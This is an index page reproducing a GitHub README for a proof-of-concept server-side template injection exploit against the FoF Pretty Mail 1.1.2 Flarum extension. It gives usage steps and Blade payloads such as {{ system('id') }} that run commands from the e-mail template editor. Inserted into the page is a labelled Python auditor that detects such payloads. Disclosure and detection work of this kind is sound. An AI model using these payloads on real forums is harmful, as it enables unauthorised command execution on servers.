Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/blue0x1/fof-pretty-mail-ssti-exploit-for-flarum
Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
Last synced: about 2 months ago
- Host: GitHub
- URL: https://github.com/blue0x1/fof-pretty-mail-ssti-exploit-for-flarum
- Owner: blue0x1
- Created: 2024-03-28T17:38:17.000Z (9 months ago)
- Default Branch: main
- Last Pushed: 2024-03-28T17:49:12.000Z (9 months ago)
- Last Synced: 2024-03-29T20:39:21.269Z (9 months ago)
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# FoF Pretty Mail SSTI 1.1.2 Exploit for Flarum
Exploit for a critical Server-Side Template Injection (SSTI) vulnerability discovered in the FoF Pretty Mail extension (version 1.1.2) used by Flarum forums. The vulnerability stems from improper sanitization of template variables, allowing attackers with administrative privileges to execute arbitrary code on the server.
Usage:
1. Obtain administrative access to a Flarum forum with the FoF Pretty Mail extension installed.
2. Navigate to the extension settings and access the email template editor.
3. Inject the following payloads into the template:
   - `{{ 7*7 }}` (demonstrates basic template expression evaluation)
   - `{{ system('id') }}` (executes a system command to display user information)
   - `{{ system('echo "Take The Rose"') }}` (executes a custom command)
4. Save the modified template and trigger an email event (e.g., user registration).
5. Observe the execution results in the received email, confirming the successful exploitation.

POC:
Editing the E-mail Template
Payload:
```blade
{{ 7*7 }}
{{ system('id') }}
{{ system('echo "Take The Rose"') }}
```

![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/116297d3-045f-4d69-be69-a524ad1de63c)
Trigger the reset-password action (or any other action that sends an e-mail) to receive the e-mail:
![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/f0e0121a-8f32-41be-9ab4-23335fe184dc)
In the received e-mail:
![image](https://github.com/blue0x1/FoF-Pretty-Mail-SSTI-Exploit-for-Flarum/assets/52697989/aee3b6c4-fbbe-4a9b-b86e-28ec473028ca)
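All three payloads above share one shape a defender can check for: an echo whose expression is something other than a plain template variable. The following added example (my own, not code from the exploit repository or from the FoF Pretty Mail project) audits a stored e-mail template on that basis; it assumes a Blade-style syntax, where `{{ }}` and `{!! !!}` echo arbitrary PHP expressions and `@php` opens a raw PHP block, and the variable names in the constructed sample are assumptions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass
class Finding:
    line: int
    kind: str      # "function_call", "php_block", "raw_echo" or "expression"
    snippet: str

# {{ ... }} or {!! ... !!}; non-greedy and allowed to span lines
ECHO_RE = re.compile(r"\{\{(.*?)\}\}|\{!!(.*?)!!\}", re.S)
# Allowlist: $var, $obj->prop, $arr['key'], chained; nothing else counts as benign
SAFE_VAR_RE = re.compile(
    r"^\s*\$[A-Za-z_]\w*(?:->[A-Za-z_]\w*|\[\s*(?:'[^']*'|\"[^\"]*\"|\d+)\s*\])*\s*$"
)
CALL_RE = re.compile(r"\b[A-Za-z_][\w\\]*\s*\(")   # e.g. system(...), \exec(...)
PHP_BLOCK_RE = re.compile(r"@php\b|<\?php|<\?=")   # raw PHP blocks (assumed syntax)

def _line_of(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1

def audit_template(text: str) -> list[Finding]:
    """Report every echo or PHP block that is not a plain variable echo."""
    findings = []
    for m in PHP_BLOCK_RE.finditer(text):
        findings.append(Finding(_line_of(text, m.start()), "php_block", m.group(0)))
    for m in ECHO_RE.finditer(text):
        raw = m.group(2) is not None          # {!! !!} skips HTML escaping
        expr = (m.group(2) if raw else m.group(1)).strip()
        if SAFE_VAR_RE.match(expr):
            if raw:  # unescaped variable: HTML injection risk, not code execution
                findings.append(Finding(_line_of(text, m.start()), "raw_echo", m.group(0)))
            continue
        kind = "function_call" if CALL_RE.search(expr) else "expression"
        findings.append(Finding(_line_of(text, m.start()), kind, m.group(0)))
    return sorted(findings, key=lambda f: f.line)

def is_safe(text: str) -> bool:
    """True when nothing in the template can reach a PHP function call."""
    return not any(f.kind in ("function_call", "php_block") for f in audit_template(text))

# Constructed sample: one legitimate variable echo plus the three payloads above.
SAMPLE = """<p>Hello {{ $user->username }},</p>
<p>{{ 7*7 }}</p>
<p>{{ system('id') }}</p>
<p>{{ system('echo "Take The Rose"') }}</p>
<div>{!! $body !!}</div>
"""
```

Running `audit_template` over the template before it is saved (or over the value already stored in the settings table) turns the `{{ 7*7 }}` probe into an "expression" finding and both `system(...)` payloads into "function_call" findings, so a rejected save or an alert replaces the e-mail the exploit relies on to confirm execution.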
Disclaimer:
This repository is intended for educational and research purposes only. The exploit is provided to raise awareness about the vulnerability and promote security best practices among Flarum users and developers. Unauthorized use of this exploit against systems without explicit consent is illegal and unethical.